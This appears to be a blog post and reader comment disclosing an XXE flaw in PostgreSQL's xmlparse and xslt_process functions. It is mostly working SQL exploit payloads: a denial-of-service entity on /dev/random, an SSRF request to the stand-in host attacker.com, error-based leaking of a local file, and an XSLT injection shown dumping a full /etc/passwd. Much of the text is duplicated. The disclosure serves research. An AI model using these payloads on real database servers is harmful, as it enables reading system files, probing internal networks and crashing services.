Recently we found and published at PHDays PostgreSQL 0day error-based XXE vulnerability.
Currently it may be used by attacker to read parts of local files and make requests from DB server to intranet (SSRF - Server Side Request Forgery).
Example:
DoS:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')
SSRF:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')
Error-based XXE:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');
Classical XXE from XSLT transformation found.
Reading any data are possible also:
SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*"> <xsl:element name="samples"> <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element> </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);
Currently it may be used by attacker to read parts of local files and make requests from DB server to intranet (SSRF - Server Side Request Forgery).
Example:
DoS:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/dev/random">]><content>&abc;</content>')
SSRF:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "http://attacker.com/?xxe=OK">]><content>&abc;</content>')
Error-based XXE:
select xmlparse(document '<?xml version="1.0" standalone="yes"?><!DOCTYPE content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;</content>');
ERROR: invalid XML documentUPDATE!
DETAILS: /etc/network/if-up.d/mountnfs:28: parser error : StartTag: invalid element name
exec 9<&0 </etc/fstab ^
/etc/network/if-up.d/mountnfs:28: parser error : xmlParseEntityRef: no name
exec 9<&0 </etc/fstab ^
/etc/network/if-up.d/mountnfs:28: parser error : chunk is not well balanced
exec 9<&0 </etc/fstab ^
Entity: line 1: parser error : Failure to process entity abc
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc;
^
Entity: line 1: parser error : Entity 'abc' not defined
E content [ <!ENTITY abc SYSTEM "/etc/network/if-up.d/mountnfs">]><content>&abc; ^
Classical XXE from XSLT transformation found.
Reading any data are possible also:
SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*"> <xsl:element name="samples"> <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element> </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);
xslt_process
-----------------------------------------------------------------------------------------
<?xml version="1.0"?>
<samples><sample>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
nslcd:x:101:103:nslcd name service LDAP connection daemon,,,:/var/run/nslcd/:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
puppet:x:109:111:Puppet configuration management daemon,,,:/var/lib/puppet:/bin/false
Debian-exim:x:111:115::/var/spool/exim4:/bin/false
alexandro:x:1000:1000:Alexander Golovko,,,:/home/alexandro:/bin/bash
oxod:x:1001:1001:,,,:/home/oxod:/bin/bash
mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false
postgres:x:104:107:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
oracle:x:1002:1002::/u01/app/oracle:/bin/bash
</sample></samples>
(1 row)
I'd like to notice that xslt_process is from xml2 postgres module, which is being deprecated [1]. E.g. in psql 9.1.3 it is turned off by default.
ОтветитьУдалитьPS. That's why I wasn't able to discover this file-reading during phdays =)
[1] http://www.postgresql.org/docs/9.1/static/xml2.html